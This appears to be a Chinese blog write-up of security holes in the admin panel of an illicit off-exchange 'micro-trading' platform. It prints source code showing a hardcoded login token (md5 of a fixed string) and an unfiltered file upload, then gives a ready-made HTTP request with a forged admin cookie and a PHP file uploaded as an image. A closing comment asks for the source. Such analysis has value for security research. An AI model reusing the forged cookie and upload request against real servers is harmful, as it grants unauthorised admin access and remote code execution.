某微交易场外黑平台

lufei 949 次浏览 2

漏洞文件

在/application/admin/controller/Base.php

<?php
namespace app\admin\controller;
use think\Controller;
use think\Db;

class Base extends Controller
{
    public function __construct(){
		parent::__construct();
		$otype = session('otype');
        if($otype && $otype == 3){
            /*
            if (session('userid') != '1') {
                $ip = $_SERVER["REMOTE_ADDR"];
                $time = date('Y-m-d H:i:s');
                file_put_contents("尝试入侵日志.txt","地址:".$ip."||时间:".$time.PHP_EOL,FILE_APPEND); 
                die;
            }
            */
        }
        
		//session_unset();
		//验证登录
		$login = cookie('denglu');
		if(!isset($login['userid'])){
			$this->error('请先登录!','login/login',1,1);
		}
		
		if(!isset($login['token']) || $login['token'] != md5('nimashabi')){
			$this->redirect('login/logout');
		}

		$request = \think\Request::instance();
		
		$contrname = $request->controller();
        $actionname = $request->action();
        $params = $request->param();;
        
        $this->assign('contrname',$contrname);
        $this->assign('actionname',$actionname);
        $this->assign('params',$params);

        
        $this->otype = $login['otype'];
        $this->uid = $login['userid'];
        $this->uname = $login['username'];

        $this->assign('otype',$this->otype);
	}


	protected function fetch($template = '', $vars = [], $replace = [], $config = [])
    {
    	$replace['__ADMIN__'] = str_replace('/index.php','',\think\Request::instance()->root()).'/static/admin';
        return $this->view->fetch($template, $vars, $replace, $config);
    }

    public function check(){
        if($this->otype != 3){
            $this->error('无权限操作');
        }
    }

    public function adminLog($msg = '',$type = 2)
    {
        $data = [
            'admin_id' => isset($this->uid) ?$this->uid:0,
            'name' => isset($this->uname) ?$this->uname: "无",
            'type' => $type,
            'controller' => request()->controller(),
            'action' => request()->action(),
            'info' => $msg,
            'ip' => request()->ip(),
            'created_at' => date('Y-m-d H:i:s'),
            'params' => json_encode(input('param.',JSON_UNESCAPED_UNICODE))
        ];

        Db::name('admin_log')->insert($data);
    }
}

在代码中29行,定义了一个token的值,只要登录的token值为md5(nimashabi)。

if(!isset($login['token']) || $login['token'] != md5('nimashabi'))

某微交易场外黑平台

某微交易场外黑平台

任意文件上传

在/application/admin/controller/Setup.php 参数配置中未过滤,导致直接可以上传恶意脚本

<?php
namespace app\admin\controller;
use think\Controller;
use think\Db;
/**
 * 系统设置和积分比例设置,可自定义设置
 */

class Setup extends Base
{

    /**
     * 基本设置
     * @author lukui  2017-04-19
     * @return [type] [description]
     */
    public function index()
    {
        $this->check();
        $map['group'] = 1;
        $map['status'] = 1;

        $data = Db::name('config')->where($map)->order('sort asc')->select();
        $this->assign('data',$data);
        return $this->fetch();
    }


    /**
     * 比例设置
     * @author lukui  2017-04-19
     * @return [type] [description]
     */
    public function proportion()
    {
        $this->check();
        $map['group'] = 2;
        $map['status'] = 1;

        $data = Db::name('config')->where($map)->order('sort asc')->select();
        $this->assign('data',$data);
        return $this->fetch('index');
    }


    /**
     * 配置比例
     * @author lukui  2017-04-19
     * @return [type] [description]
     */
    public function addsetup()
    {
        $this->check();
        if(input('post.')){
            $data = input('post.');
            $data['create_time'] = $data['update_time'] = time();
            $data['status'] = 1;

            if(isset($data['id'])){
                $ids = Db::name('config')->update($data);
            }else{
                $ids = Db::name('config')->insert($data);
            }
            
            if($ids){
                cache('conf',null);

                $this->adminLog("修改了配置");
                return WPreturn('配置成功',1);
            }else{
                return WPreturn('配置失败,请重试',-1);
            }
            
            exit;
        }else{

            if(input('param.id')){
                $id = input('param.id');
                $data = Db::name('config')->where('id',$id)->find();
                $this->assign($data);
            }
            return $this->fetch();
        }

        
    }


    /**
     * 编辑配置/比例
     * @author lukui  2017-04-19
     * @return [type] [description]
     */
    public function editconf()
    {
        $this->check();
        if(input('post.')){

            $data = input('post.');

            foreach ($data as $k => $v) {
                $arr = explode('_',$k);
                $_data['id'] = $arr[1];
                $_data['value'] = $v;
                $file = request()->file('pic_'.$_data['id']);
                
                if($file){
                    
                    $info = $file->move(ROOT_PATH . 'public' . DS . 'uploads');
                    if($info){
                        $_data['value'] = '/public' . DS . 'uploads/'.$info->getSaveName();
                    }
                }
                if($_data['value'] == '' && isset($arr[2]) && $arr[2] == 3){
                    continue;
                }
                
                Db::name('config')->update($_data);

            }
            cache('conf',null);
            $this->success('编辑成功');
        }

        
    }



    public function deleteconf()
    {
        $this->check();
        if(input('post.')){

            $id = input('post.id');
            
            if(!$id){
                return WPreturn('参数错误',-1);
            }

            $_data['id'] = $id;
            $_data['status'] = 0;

            $ids = Db::name('config')->update($_data);
            if($ids){
                cache('conf',null);
                $this->adminLog("删除了配置-{$id}");
                return WPreturn('删除成功',1);
            }else{
                return WPreturn('删除失败,请重试',-1);
            }
            
        }
    }


    /**
     * 所有配置列表
     * @author lukui  2017-04-19
     * @return [type] [description]
     */
    public function deploy()
    {
        $this->check();
        $map['status'] = 1;

        $data = Db::name('config')->where($map)->order('sort asc')->select();
        $this->assign('data',$data);
        return $this->fetch();
    }

    public function check(){
        if($this->otype != 3){
            $this->error('无权限操作');
        }
    }


}
POST /admin/setup/editconf.html HTTP/1.1
Host: xxxx
Content-Length: 14826
Cache-Control: max-age=0
Origin: https://xxxx
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryos3gT80Ff832vVe3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://xxx/admin/setup/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:think_var=zh-cn; PHPSESSID=d8r9cn6hqa312cf6alg7ni6vg4; denglu=think%3A%7B%22otype%22%3A%223%22%2C%22userid%22%3A%221%22%2C%22username%22%3A%22admin%22%2C%22token%22%3A%223c341b110c44ad9e7da4160e4f865b63%22%7D
Connection: close

------WebKitFormBoundaryos3gT80Ff832vVe3
Content-Disposition: form-data; name="value_26_2"


------WebKitFormBoundaryos3gT80Ff832vVe3
Content-Disposition: form-data; name="pic_26"; filename="avatar.php"
Content-Type: image/png

DATA
------WebKitFormBoundaryos3gT80Ff832vVe3--

发表评论 取消回复
表情

  1. fengjianji
    fengjianji Lv 1

    大佬,求这份源码分析下,不胜感激,t00ls来的